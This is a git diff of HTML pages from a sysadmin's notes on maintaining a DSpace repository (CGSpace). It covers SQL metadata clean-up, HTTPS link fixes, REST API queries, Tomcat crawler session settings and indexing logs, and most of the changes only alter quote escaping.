<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;,&#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
</code></pre><ul>
<li>Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)</li>
<li>And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc</li>
@ -321,9 +321,9 @@ UPDATE 0
<ul>
<li>Fix some messed up authors on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;799da1d8-22f3-43f5-8233-3d2ef5ebf8a8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Charleston, B.%&#39;;
UPDATE 10
dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
dspace=# update metadatavalue set authority=&#39;e936f5c5-343d-4c46-aa91-7a1fff6277ed&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Knight-Jones%&#39;;
UPDATE 36
</code></pre><ul>
<li>I updated the authority index but nothing seemed to change, so I&rsquo;ll wait and do it again after I update Discovery below</li>
@ -336,7 +336,7 @@ UPDATE 36
</code></pre><ul>
<li>Fix a bunch of countries in Open Refine and run the corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t &#39;correct&#39; -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Run a shit ton of author fixes from Peter Ballantyne that we&rsquo;ve been cleaning up for two months:</li>
@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
</code></pre><ul>
<li>Run a few URL corrections for ilri.org and doi.org, etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://www.ilri.org&#39;,&#39;https://www.ilri.org&#39;) where resource_type_id=2 and text_value like &#39;%http://www.ilri.org%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://mahider.ilri.org&#39;, &#39;https://cgspace.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://mahider.%.org%&#39; and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://dx.doi.org%&#39; and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://doi.org%&#39; and metadata_field_id not in (18,26,28,111);
</code></pre><ul>
<li>I skipped metadata fields like citation and description</li>
</ul>

View File

@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module
Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module (#286)
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -160,7 +160,7 @@ java.lang.NullPointerException
<ul>
<li>Horrible one liner to get Linode ID from certain Ansible host vars:</li>
</ul>
<pre tabindex="0"><code>$ grep -A 3 contact_info * | grep -E &quot;(Orth|Sisay|Peter|Daniel|Tsega)&quot; | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
<pre tabindex="0"><code>$ grep -A 3 contact_info * | grep -E &#34;(Orth|Sisay|Peter|Daniel|Tsega)&#34; | awk -F&#39;-&#39; &#39;{print $1}&#39; | grep linode | uniq | xargs grep linode_id
</code></pre><ul>
<li>I noticed some weird CRPs in the database, and they don&rsquo;t show up in Discovery for some reason, perhaps the <code>:</code></li>
<li>I&rsquo;ll export these and fix them in batch:</li>
@ -170,7 +170,7 @@ COPY 22
</code></pre><ul>
<li>Test running the replacements:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Add <code>AMR</code> to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/288">#288</a>)</li>
</ul>
@ -200,11 +200,11 @@ COPY 22
<li>Helping Megan Zandstra and CIAT with some questions about the REST API</li>
<li>Playing with <code>find-by-metadata-field</code>, this works:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39;
</code></pre><ul>
<li>But the results are deceiving because metadata fields can have text languages and your query must match exactly!</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
text_value | text_lang
------------+-----------
SEEDS |
@ -215,23 +215,23 @@ COPY 22
<li>So basically, the text language here could be null, blank, or en_US</li>
<li>To query metadata with these properties, you can do:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
55
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
34
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;en_US&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
</code></pre><ul>
<li>The results (55+34=89) don&rsquo;t seem to match those from the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang is null;
count
-------
15
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;&#39;;
count
-------
4
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;en_US&#39;;
count
-------
66
@ -267,27 +267,27 @@ COPY 14
</code></pre><ul>
<li>Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
UPDATE 85
</code></pre><ul>
<li>The <code>fix-metadata.py</code> script I have is meant for specific metadata values, so if I want to update some <code>text_lang</code> values I should just do it directly in the database</li>
<li>For example, on a limited set:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;LIVESTOCK&#39; and text_lang=&#39;&#39;;
UPDATE 420
</code></pre><ul>
<li>And assuming I want to do it for all fields:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang=&#39;&#39;;
UPDATE 183726
</code></pre><ul>
<li>After that restarted Tomcat and PostgreSQL (because I&rsquo;m superstitious about caches) and now I see the following in REST API query:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
71
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
0
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;en_US&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
</code></pre><ul>
<li>Not sure what&rsquo;s going on, but Discovery shows 83 values, and database shows 85, so I&rsquo;m going to reindex Discovery just in case</li>
</ul>
@ -298,7 +298,7 @@ $ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: applica
<li>So there is apparently this Tomcat native way to limit web crawlers to one session: <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve">Crawler Session Manager</a></li>
<li>After adding that to <code>server.xml</code> bots matching the pattern in the configuration will all use ONE session, just like normal users:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -312,7 +312,7 @@ Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
X-Robots-Tag: none
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
<ul>
<li>Seems the default regex doesn&rsquo;t catch Baidu, though:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -349,7 +349,7 @@ Transfer-Encoding: chunked
Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
<li>Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:</li>
</ul>
<pre tabindex="0"><code>&lt;!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers --&gt;
&lt;Valve className=&quot;org.apache.catalina.valves.CrawlerSessionManagerValve&quot;
crawlerUserAgents=&quot;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*&quot; /&gt;
&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*&#34; /&gt;
</code></pre><ul>
<li>Looking at the bots that were active yesterday it seems the above regex should be sufficient:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\&quot;' /var/log/nginx/access.log | sort | uniq
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)&quot; &quot;-&quot;
<pre tabindex="0"><code>$ grep -o -E &#39;Mozilla/5\.0 \(compatible;.*\&#34;&#39; /var/log/nginx/access.log | sort | uniq
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
</code></pre><ul>
<li>Neat maven trick to exclude some modules from being built:</li>
</ul>
@ -393,9 +393,9 @@ COPY 2515
<li>Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test</li>
<li>Test an update old, non-HTTPS links to the CCAFS website in CGSpace metadata:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
UPDATE 164
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
UPDATE 7
</code></pre><ul>
<li>Had to run it twice to get all (not sure about &ldquo;global&rdquo; regex in PostgreSQL)</li>
@ -404,11 +404,11 @@ UPDATE 7
<li>I&rsquo;m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn&rsquo;t as good</li>
<li>The results were very good, I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>In related news, I&rsquo;m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace&rsquo;s media filter has made thumbnails of THEM):</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where text_value like &#39;%.jpg.jpg&#39;;
</code></pre><ul>
<li>I&rsquo;m not sure if there&rsquo;s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore&hellip;</li>
</ul>
@ -464,7 +464,7 @@ UPDATE 7
<li>One user says they are still getting a blank page when he logs in (just CGSpace header, but no community list)</li>
<li>Looking at the Catlina logs I see there is some super long-running indexing process going on:</li>
</ul>
<pre tabindex="0"><code>INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
<pre tabindex="0"><code>INFO: FrameworkServlet &#39;oai&#39;: initialization completed in 2600 ms
[&gt; ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
[&gt; ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
[&gt; ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item&#39;s bitstream stats
2016-11-29 07:56:36,608 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,701 INFO org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
